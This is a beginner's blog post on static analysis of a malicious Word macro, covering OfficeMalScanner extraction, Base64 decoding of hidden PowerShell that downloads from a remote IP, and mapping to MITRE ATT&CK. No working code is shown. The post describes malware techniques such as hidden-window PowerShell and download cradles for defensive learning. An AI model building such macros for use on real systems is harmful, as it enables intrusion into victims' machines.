Malware Analysis of a Microsoft Word document with embedded macro

James Santiago
6 min readOct 3, 2020

--

What this article is about:

This is a blog recording the preliminary analysis of a malware. The goal of the article is three fold

(1) to give a quick basic snapshot of the steps involved in one form of static analysis

(2) to bring in a sense of appreciation on how much can be done in a quick 30–60 min work

(3) to inspire others pondering about entering the malware analysis field.

What this article is not:

This article will not provide a complete, end-to-end analysis of a malware sample. Neither will it provide basics of Virtual Machine(VM) nor on terms like PowerShell, Base64 encoding, OfficeMalScanner, VisualBasic(VB) etc.,

Analyzing the Malware Sample (PurpleFlower.docx):

Intro & disclaimer aside now let us get on with the main topic. The sequence of flow used in the analysis is as follows (Fig. 1):

Figure 1: Steps followed in the analysis

Almost all articles on Malware Analysis recommend doing the analysis in an isolated environment. Abiding by that advice, in this case a VirtualBox with Windows7 appliance was used.

The Windows7 appliance should have OfficeMalScanner in it. OfficeMalScanner is a quick method to scan for shellcode and encrypted Portable Executable files (e.g., .exe, .dll) as well as pulling macro details from infected Office documents (ref.1)

Figure 2: Using OfficeMalScanner

The OfficeMalScanner tells us in a click if the Office document has any embedded VBA code in it, and extracts the code into a small file (‘ThisDocument’) (Fig. 2).

We can then use a text editor like NotePad++ to look at this small file. At the first glance, after opening in NotePad++ it was hard to make head or tail of it. We can choose the VisualBasic ‘Language’ option in NotePad++, enhances the readability.

Figure 3: A sample of code(output from OfficeMalScanner) as viewed in text editor

At this point we don’t know what the code is up to(Fig. 3), but we get a sense that there is some intention to download a specific file from some URL on to the victim’s machine. We move on to look at the rest of the VB code.

Figure 4: Moving along in text editor, looking at the code from ‘ThisDocument’

There is some ‘x’ and ‘y’ parameter being declared(Fig. 4). What is shown above is a small part of the VB code. The text in orange and the sample of code in green does not look like a code, but some form of encrypted information.

We use www.base64decode.org to decode this from Base64 to ASCII text. The information in orange turns out to be as shown in the figure below (Fig. 5): The IP address has been obfuscated just to maintain anonymity.

Figure 5: A piece of decoded output of the file from OfficeMalScanner

Going back to understand what this piece of code is doing; It appears that this piece of code enables the malware to execute its PowerShell commands in a window hidden from the main view of the user. But what is the purpose of the IP address? We see the word, ‘DownloadString’. Recall that earlier we saw the first piece of code which looked like it was meant to download some file from some URL? Is that connected to these lines that are encrypted in Base64? At this point we don’t know.

We move on to decode the material in green(Fig.4). Only a small piece of the material is shown in figure above. This part (‘Dim x’) has characters that are not Base64, characters such as ‘&’ (ampersand), ‘_’ (underscore), “ (opening double quotes), etc., After removing these and feeding this into www.base64decode.org we get some output. A part of it is shown in Figure 6.

Figure 6: Output from OfficeMalScanner decoded from Base64 to ASCII

Trying to understand this part of PowerShell (Fig.6) is not straightforward, let alone trying to explain it here. We’ll reserve that for a future article.

Big Picture

Even at this stage of being new in looking at a malware it helps to zoom out and get the big picture. We know that the malware is an office document with embedded VB code in it. To get the big picture we go to https://attack.mitre.org/ and search for the attack matrix. On the first appearance it is a daunting looking table (Fig.7). Not having done a complete analysis of this malware we can focus just on the first three tactics (tactics are columns in the matrix). The malware sample was provided by MalTrack, but we don’t know how it was delivered to a victim in real life. The file was 2MB in size, I find it hard to believe it being sent as an attachment in email. Lets look in the first column of the Matrix which is the Tactic of ‘Initial Access’ and go down the column. By going down the column we are looking at different techniques used by the malicious hacker, two techniques look to be possibilities: ‘Spearphishing Attachment’ & ‘Supply Chain Compromise’. Large sized documents are often exchanged in the supply chain loop.

Figure 7: Fitting our sample in the Mitre ATT&CK framework

Looking at the 2nd column or 2nd tactic, ‘Execution’ — we can easily say it was PowerShell. Other techniques in this column may apply, but we’ll keep it simple for now.

Looking at the 3rd column or 3rd tactic, ‘Persistence’ its a long list. Lots of new words that we may not have come across. Lets persist and look through, could ‘External Remote Services’ apply? Recall that the script was connecting to a malicious URL and downloading a file from there. ‘Office Application Startup’ is a good choice as well. Could ‘AppInit DLL’ be one of the techniques? (the PowerShell had the command DllImport(“kernel32.dll”)? We don’t know at this point, we are just merely speculating for an exercise.

We’ll call it good for now.

Summary

So what did we achieve so far? One might say nothing, but wait, didn’t we get a brief glimpse on how to get a quick look at a malware? In this case it was a macro embedded in an Office document. The document was checked using OfficeMalScanner in a VirtualBox. The OfficeMalScanner extracted the macro code. We inspected the macro code in a text editor. We used a decoder to decode from Base64 to ASCII. Once converted we tried to make some sense of the ASCII text which turns out to be a PowerShell code. The macro is trying to execute PowerShell code — not a good sign! We had some idea that some downloading attempt is made from some IP address — very malicious! (unless it was for some known legitimate purpose). We also got a quick glimpse on where this malware falls in the Mitre ATT&CK framework.

Final Words:

Well, I sort of lied when I mentioned that the analysis could be done in 30–60min. Although I had played with VM’s in the past, the Windows7 machine I used here took some time to get set up correctly. Once that was out of the way, rest went smooth. However I did spend more like 2–3 hours, just because I wanted to research more on each sub-topic. So the actual work can easily be accomplished in 30–60 min.

Early on in this article it was mentioned that details of PowerShell, Base64 encoding, OfficeMalScanner etc., will not be provided. Truth be told, an entrant to the field can feel comfortable in knowing that only this very basic understanding is needed for a quick snap-shot on this malware.

Being a new entrant, I expect there are mistakes in the approach I followed or in my interpretation. This is not intended and I hope the reader understands. Reader’s feedback is greatly appreciated.

Acknowledgment:

I would like to thank MalTrak for the Malware sample and preliminary instructions in Malware analysis. I would also like to thank Amr Thabet for his encouragement and initial review of the article.

References:

1) ‘Taking apart office automation documents with OfficeMalScanner’ by José Manuel Fernández, https://www.securityartwork.es/2015/02/02/taking-apart-office-automation-documents-with-officemalscanner/

2) ‘Malware Monday: OfficeMalScanner’, by MattB, https://medium.com/@bromiley/malware-monday-officemalscanner-b1e5f6417df6.

3) https://attack.mitre.org/

4) The following online decoder was used for decoding from UTF-8 format to ASCII text: https://www.base64decode.org/

--

--